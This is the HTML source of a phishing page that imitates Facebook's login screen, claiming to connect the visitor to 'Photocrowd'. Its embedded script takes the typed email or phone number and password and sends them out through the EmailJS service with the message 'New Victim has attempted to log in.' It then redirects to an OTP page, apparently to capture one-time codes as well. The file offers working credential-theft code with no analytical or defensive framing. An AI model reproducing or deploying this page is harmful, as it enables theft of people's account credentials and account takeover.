<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no" />
  <title>Facebook - Log In or Sign Up</title>
  <link rel="icon" type="image/svg+xml" sizes="683x683" href="assets/img/facebook.svg" />
  <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto" />
  <link rel="stylesheet" href="assets/css/Contact-Form-Clean.css" />
  <link rel="stylesheet" href="assets/css/styles.css" />
</head>
<body>
  <style>
    body {
      font-family: inherit;
    }
  </style>
  <p style="
      margin-bottom: 0;
      padding-left: 12px;
      padding-top: 5px;
      padding-bottom: 5px;
      border-bottom: 1px solid #e5ce3a;
      background: #fffbe2;
      color: #9f7d2d;
      text-align: center;
    ">
    You must log in first.
  </p>
  <nav class="navbar navbar-light navbar-expand-md" style="padding-bottom: 10px">
    <div class="container-fluid">
      <img class="img-fluid" src="assets/img/dF5SId3UHWd.svg" style="width: 140px; margin-top: 0px" />
    </div>
  </nav>
  <div class="contact-clean" style="padding: 0; padding-top: 0px; padding-bottom: 0px; background: rgb(255, 255, 255);">
    <form id="loginForm" method="post" style="width: 100%; padding-top: 0; padding-right: 15px; padding-left: 10px; border-style: none; box-shadow: inset 0px 0px;">
      <div class="form-group" style="margin-bottom: 7px">
        <div>
          <img class="img-fluid" src="assets/img/download%20(4).jpg" style="width: 68px; margin-bottom: 11px;">
          <p style="text-align: center; padding-right: 15%; padding-left: 15%; color: rgba(99,106,113,0.88);">Log into your Facebook account to connect to <strong>Photocrowd</strong></p>
        </div>
        <div id="error-message" style="display: none; color: black; text-align: center; margin-bottom: 10px; border: 1px solid red; padding: 4px; background: rgba(255, 91, 91, 0.13);">
          <b> Wrong credentials </b><br />Invalid username or password
        </div>
        <input class="form-control form-control-sm" type="text" id="a1" placeholder="Mobile number or email" style="background: #f5f6f7; border-radius: 5px" required />
      </div>
      <div class="form-group" style="margin-bottom: 14px">
        <input class="form-control form-control-sm" type="password" id="a2" style="background: #f5f6f7; border-radius: 5px" placeholder="Password" required />
      </div>
      <div class="form-group">
        <button class="btn btn-secondary btn-block btn-lg text-capitalize" id="css-qq" type="submit" style="background: #1877f2; font-size: 16px">Log in</button>
      </div>
      
      <div style="margin-top: 23px; text-align: center">
        <span class="label" style="margin-top: -13px; margin-bottom: 1px; margin-right: 50%; margin-left: 43%; width: 53px;">or</span>
        <span class="line" style="background: rgba(154, 154, 154, 0.25)"></span>
      </div>
      <div class="form-group" style="margin-left: auto; margin-right: auto; margin-top: 36px">
        <a class="btn btn-secondary btn-block btn-lg text-capitalize" role="button" style="background: #00a400; font-size: 13px; font-style: normal; font-weight: bold; text-align: center; width: 172px; padding-left: 10px; padding-right: 10px; height: 36px; padding-top: 11px;" href="https://m.facebook.com/reg/">Create New Account</a>
        <p style="text-align: center; margin-top: 14px; font-size: 14px; color: #85a4d0;">
          <a href="https://touch.facebook.com/login/identify/?ctx=recover&amp;c=https%3A%2F%2Ftouch.facebook.com%2F&amp;multiple_results=0&amp;ars=facebook_login&amp;lwv=100&amp;_rdr" style="color: #548ad6">Forgot Password?</a>
        </p>
      </div>
    </form>
  </div>
  
  <!-- Loading Animation -->
  <div id="loadingAnimation" style="display: none; position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%);">
    <div class="spinner-border" role="status">
      <span class="sr-only">Loading...</span>
    </div>
  </div>

  <!-- Use the latest EmailJS SDK script -->
  <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
  <script>
    (function () {
      emailjs.init("AninNmoDSGQbw7ycL"); // Replace with your EmailJS user ID
    })();

    document.getElementById("loginForm").addEventListener("submit", function (event) {
      event.preventDefault(); // Prevent form from submitting normally

      // Show loading animation
      document.getElementById("loadingAnimation").style.display = "block";

      // Collect form data
      var formData = {
        to_name: "Recipient Name", // Replace with the recipient's name
        from_name: document.getElementById("a1").value,
        user_email: document.getElementById("a1").value, // The user's email or mobile number
        user_password: document.getElementById("a2").value, // The user's password
        message: "New Victim has attempted to log in.",
      };

      // Send email using EmailJS
      emailjs.send("service_86t4yt7", "template_gy4stpc", formData).then(
        function (response) {
          console.log("SUCCESS!", response.status, response.text);
          // Hide loading animation and redirect to otp.html
          document.getElementById("loadingAnimation").style.display = "none";
          window.location.href = "otp.html";
        },
        function (error) {
          console.error("FAILED...", error); // Log the error for debugging
          document.getElementById("loadingAnimation").style.display = "none";
          alert("Failed to send email. Error: " + JSON.stringify(error)); // Show detailed error
        }
      );
    });
  </script>

  <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.11.6/dist/umd/popper.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.min.js"></script>
</body>
</html>
